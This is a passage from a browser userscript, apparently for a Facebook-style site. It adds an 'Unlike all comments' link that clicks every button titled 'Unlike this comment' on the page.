	div.style.border = "2px solid #94a3c4";
	div.style.padding = "2px";
	div.innerHTML = "<a style=\"font-weight:bold;color:#333333\" href=\"JavaScript:AutoUnLikeComments()\">Unlike all comments</a>"
	
	body.appendChild(div);
	
	unsafeWindow.AutoUnLikeComments = function() {
	
		buttons = document.getElementsByTagName("button");
		for(i = 0; i < buttons.length; i++) {
			myClass = buttons[i].getAttribute("class");
			if(myClass != null && myClass.indexOf("") >= 0)
				if(buttons[i].getAttribute("title") == "Unlike this comment")
					buttons[i].click();
		}
		
	};
}
// ==============